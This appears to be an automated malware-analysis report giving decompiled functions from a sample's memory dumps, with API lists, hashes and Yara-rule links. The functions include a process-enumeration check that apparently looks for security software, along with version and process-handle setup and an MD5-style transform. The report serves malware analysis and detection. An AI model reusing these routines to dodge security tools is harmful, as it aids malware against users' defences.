Non-executed Functions

Function 00FC19E7, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00FC19E7() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0xfca2d0; // 0x292d5a8
						_t2 = _t9 + 0xfcbe04; // 0x73617661
						_push( &_v264);
						if( *0xfca11c() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x00fc19f2
0x00fc19fc
0x00fc1a00
0x00fc1a0a
0x00fc1a3b
0x00fc1a11
0x00fc1a16
0x00fc1a23
0x00fc1a2c
0x00fc1a43
0x00fc1a2e
0x00fc1a36
0x00000000
0x00fc1a36
0x00fc1a44
0x00fc1a45
0x00000000
0x00fc1a45
0x00000000
0x00fc1a3f
0x00fc1a4b
0x00fc1a50

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00FC19F7
Process32First.KERNEL32(00000000,?), ref: 00FC1A0A
Process32Next.KERNEL32(00000000,?), ref: 00FC1A36
CloseHandle.KERNEL32(00000000), ref: 00FC1A45

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 5084e03cca7ec594d7f6c2695649f3b0dc55ae85081975353cc4bb45976d537e
Instruction ID: 388916fd26ba96136562b5677e1fdddcfafaf568bfbf87bed7828ce29b1c7eb9
Opcode Fuzzy Hash: 5084e03cca7ec594d7f6c2695649f3b0dc55ae85081975353cc4bb45976d537e
Instruction Fuzzy Hash: 36F0BB369451295AD720A7369F4BFEB76BCFBC6314F000059F506D3001E738D965B6B1

Uniqueness

Uniqueness Score: -1.00%

Function 6E05146C, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E05146C() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x6e0541b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6e0541bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x6e0541ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x6e0541a8 = _t5;
					 *0x6e0541b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x6e0541a4 = _t6;
					if(_t6 == 0) {
						 *0x6e0541a4 =  *0x6e0541a4 | 0xffffffff;
					}
					return 0;
				}
			}

0x6e05146d
0x6e05147b
0x6e051483
0x6e051488
0x6e0514d2
0x6e0514d2
0x6e05148a
0x6e051492
0x6e0514ce
0x6e0514d0
0x6e051494
0x6e051494
0x6e051499
0x6e0514a7
0x6e0514ac
0x6e0514b2
0x6e0514ba
0x6e0514bf
0x6e0514c1
0x6e0514c1
0x6e0514cb
0x6e0514cb

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E0517B8,73B763F0,00000000), ref: 6E05147B
GetVersion.KERNEL32 ref: 6E05148A
GetCurrentProcessId.KERNEL32 ref: 6E051499
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E0514B2

Memory Dump Source

Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: bc9079dbe920206525bea962aabf025604a249567bf963f7d334f0d46ea17963
Instruction ID: 531187bab72e9b062dfb684982b792fcbe5083937ac4a7727a072defc4854279
Opcode Fuzzy Hash: bc9079dbe920206525bea962aabf025604a249567bf963f7d334f0d46ea17963
Instruction Fuzzy Hash: C8F09A30646B10BFEF808FB9AF197823BE0F70AB11F00101AF106C92C4D3B044628F88

Uniqueness

Uniqueness Score: -1.00%

Function 00FC6609, Relevance: 1.9, APIs: 1, Instructions: 610
COMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E00FC6609(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t274;
				signed int _t337;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t375;
				signed int _t377;
				signed int _t379;
				signed int _t381;
				signed int _t383;
				intOrPtr* _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t443;
				signed int _t445;
				void* _t447;
				signed int _t507;
				signed int _t598;
				signed int _t606;
				signed int _t612;
				signed int _t678;
				signed int* _t681;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				signed int _t691;
				signed int _t696;
				signed int _t698;
				signed int _t717;
				signed int _t719;
				signed int _t721;
				signed int _t723;
				signed int _t725;
				signed int _t727;
				signed int _t733;
				signed int _t739;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				signed int _t747;

				_t226 = _a4;
				_t347 = __ecx + 2;
				_t681 =  &_v76;
				_t447 = 0x10;
				do {
					_t274 =  *(_t347 - 1) & 0x000000ff;
					_t347 = _t347 + 4;
					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
					_t681 =  &(_t681[1]);
					_t447 = _t447 - 1;
				} while (_t447 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t682 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t407 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t348 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
				asm("rol ecx, 0xc");
				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
				asm("ror esi, 0xa");
				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
				_v8 = _t684;
				_t689 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
				asm("rol ecx, 0xc");
				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
				asm("ror esi, 0xa");
				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
				_v8 = _t691;
				_t696 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
				asm("rol ecx, 0xc");
				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
				asm("ror esi, 0xa");
				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
				_v8 = _t698;
				asm("rol eax, 0x7");
				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
				_t507 =  !_t356;
				asm("ror edx, 0xf");
				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
				_v12 = _t415;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
				asm("rol eax, 0x5");
				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
				asm("rol ecx, 0x9");
				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
				asm("ror esi, 0xc");
				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
				asm("rol eax, 0x5");
				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
				asm("rol ecx, 0x9");
				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
				asm("ror esi, 0xc");
				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
				asm("rol eax, 0x5");
				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
				asm("rol ecx, 0x9");
				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
				asm("ror esi, 0xc");
				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
				asm("rol eax, 0x5");
				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
				asm("rol ecx, 0x9");
				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
				asm("ror esi, 0xc");
				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
				asm("rol eax, 0x4");
				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
				asm("rol ecx, 0xb");
				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
				_t598 = _t366 ^ _t425;
				asm("ror esi, 0x9");
				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
				asm("rol eax, 0x4");
				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
				asm("rol edi, 0xb");
				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
				_t337 = _t606 ^ _t427;
				asm("ror ecx, 0x9");
				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
				asm("rol eax, 0x4");
				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
				asm("rol esi, 0xb");
				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
				_t429 = _t733 ^ _t612;
				asm("ror ecx, 0x9");
				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
				asm("rol eax, 0x4");
				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
				asm("rol edx, 0xb");
				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
				asm("ror ecx, 0x9");
				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
				asm("rol eax, 0x6");
				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
				asm("rol edx, 0xa");
				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
				asm("ror ecx, 0xb");
				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
				asm("rol eax, 0x6");
				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
				asm("rol edx, 0xa");
				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
				asm("ror ecx, 0xb");
				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
				asm("rol eax, 0x6");
				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
				asm("rol edx, 0xa");
				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
				asm("ror edi, 0xb");
				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
				asm("rol eax, 0x6");
				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
				asm("rol edx, 0xa");
				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
				_t399 = _a4;
				asm("rol esi, 0xf");
				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
				 *_t399 =  *_t399 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
				return memset( &_v76, 0, 0x40);
			}

0x00fc660c
0x00fc6617
0x00fc661a
0x00fc661d
0x00fc661e
0x00fc661e
0x00fc6629
0x00fc663a
0x00fc663c
0x00fc663f
0x00fc663f
0x00fc6642
0x00fc6642
0x00fc6645
0x00fc6645
0x00fc6648
0x00fc6648
0x00fc6665
0x00fc6668
0x00fc667e
0x00fc6681
0x00fc669b
0x00fc669e
0x00fc66b4
0x00fc66b7
0x00fc66b9
0x00fc66d1
0x00fc66d4
0x00fc66d7
0x00fc66ef
0x00fc66f2
0x00fc670c
0x00fc670f
0x00fc6725
0x00fc6728
0x00fc672a
0x00fc6742
0x00fc6747
0x00fc674a
0x00fc6760
0x00fc6763
0x00fc677d
0x00fc6780
0x00fc6796
0x00fc6799
0x00fc679b
0x00fc67b6
0x00fc67b9
0x00fc67d0
0x00fc67d3
0x00fc67d7
0x00fc67f0
0x00fc67f3
0x00fc67f5
0x00fc67f8
0x00fc6813
0x00fc6816
0x00fc682f
0x00fc6832
0x00fc6842
0x00fc6845
0x00fc685d
0x00fc6860
0x00fc687a
0x00fc687d
0x00fc6895
0x00fc6898
0x00fc68ae
0x00fc68b1
0x00fc68c9
0x00fc68cc
0x00fc68e4
0x00fc68e7
0x00fc6901
0x00fc6904
0x00fc691a
0x00fc691d
0x00fc6935
0x00fc6938
0x00fc6952
0x00fc6955
0x00fc696d
0x00fc6970
0x00fc6986
0x00fc6989
0x00fc69a1
0x00fc69a4
0x00fc69bc
0x00fc69bf
0x00fc69d1
0x00fc69d4
0x00fc69e6
0x00fc69e9
0x00fc69fb
0x00fc69fe
0x00fc6a02
0x00fc6a12
0x00fc6a15
0x00fc6a23
0x00fc6a26
0x00fc6a38
0x00fc6a3b
0x00fc6a4f
0x00fc6a52
0x00fc6a54
0x00fc6a64
0x00fc6a67
0x00fc6a79
0x00fc6a7c
0x00fc6a8a
0x00fc6a8d
0x00fc6a9f
0x00fc6aa2
0x00fc6aa6
0x00fc6ab6
0x00fc6ab9
0x00fc6acb
0x00fc6ace
0x00fc6adc
0x00fc6adf
0x00fc6af1
0x00fc6af4
0x00fc6b06
0x00fc6b09
0x00fc6b1d
0x00fc6b20
0x00fc6b34
0x00fc6b37
0x00fc6b4b
0x00fc6b4e
0x00fc6b62
0x00fc6b65
0x00fc6b79
0x00fc6b7c
0x00fc6b90
0x00fc6b95
0x00fc6ba7
0x00fc6baa
0x00fc6bbe
0x00fc6bc1
0x00fc6bd5
0x00fc6bd8
0x00fc6bee
0x00fc6bf1
0x00fc6c05
0x00fc6c08
0x00fc6c1a
0x00fc6c1d
0x00fc6c31
0x00fc6c34
0x00fc6c48
0x00fc6c4b
0x00fc6c5f
0x00fc6c68
0x00fc6c6b
0x00fc6c74
0x00fc6c7d
0x00fc6c85
0x00fc6c8d
0x00fc6c97
0x00fc6cac

APIs

memset.NTDLL ref: 00FC6CA0

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: eab64be8417cd5ac1b5978694f6adc096df73fbdc74eaf4c815df7827f3802de
Instruction ID: 6c2ceccd82edb532d2e72253980e20d5f0c33f250589f409492196cb1cecfb46
Opcode Fuzzy Hash: eab64be8417cd5ac1b5978694f6adc096df73fbdc74eaf4c815df7827f3802de
Instruction Fuzzy Hash: E422847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 6E065F70, Relevance: 1.7, Strings: 1, Instructions: 451COMMON

Download Yara Rule

Strings

@, xrefs: 6E065F78

Memory Dump Source

Source File: 00000000.00000002.1182584056.000000006E05E000.00000020.00020000.sdmp, Offset: 6E05E000, based on PE: false

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: c15ad4930112c82b4e26323fef8472f5668a047b5edb9cb9d24cbe9eac22ec40
Instruction ID: 396ad989791fcdb48f30d3365afd1d415d625f31b86645b9e20ce73c450ae6ff
Opcode Fuzzy Hash: c15ad4930112c82b4e26323fef8472f5668a047b5edb9cb9d24cbe9eac22ec40
Instruction Fuzzy Hash: 2D2226B0A14914DFDB08CF6CD698B597BF2BB8A300B94E62DE59597389C7306C06CF85

Uniqueness

Uniqueness Score: -1.00%

Function 6E052485, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E052485(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6e0541f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6e054240 = 1;
										__eflags =  *0x6e054240;
										if( *0x6e054240 != 0) {
											goto L60;
										}
										_t84 =  *0x6e0541f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6e054240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6e0541f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6e054200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6e0541fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6e054200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e054200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6e054240 = 1;
							__eflags =  *0x6e054240;
							if( *0x6e054240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6e054200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6e054200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6e054240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6e054200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6e0541f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6e054200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e054200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x6e05248f
0x6e052492
0x6e052498
0x6e0524b6
0x00000000
0x6e0524b6
0x6e0524a0
0x6e0524a9
0x6e0524af
0x6e0524be
0x6e0524c1
0x6e0524c4
0x6e0524ce
0x6e0524ce
0x6e0524d0
0x6e0524d3
0x6e0524d5
0x6e0524d5
0x6e0524d7
0x6e0524da
0x00000000
0x00000000
0x6e0524dc
0x6e0524de
0x6e052544
0x6e052544
0x6e0526a2
0x00000000
0x6e0526a2
0x6e0524e0
0x6e0524e0
0x6e0524e4
0x6e0524e6
0x6e0524e6
0x6e0524e6
0x6e0524e6
0x6e0524e9
0x6e0524ea
0x6e0524ed
0x6e0524ed
0x6e0524f1
0x6e0524f5
0x6e052503
0x6e052503
0x6e05250b
0x6e052511
0x6e052513
0x6e052515
0x6e052525
0x6e052532
0x6e052536
0x6e05253b
0x6e05253d
0x6e0525bb
0x6e0525bb
0x6e05253f
0x6e05253f
0x6e05253f
0x6e0525bd
0x6e0525bf
0x6e0526a0
0x6e0526a0
0x00000000
0x6e0525c5
0x6e0525c5
0x6e0525cc
0x00000000
0x00000000
0x6e0525d2
0x6e0525d6
0x6e052632
0x6e052634
0x6e05263c
0x6e05263e
0x6e052640
0x00000000
0x00000000
0x6e052642
0x6e052648
0x6e05264a
0x6e05264c
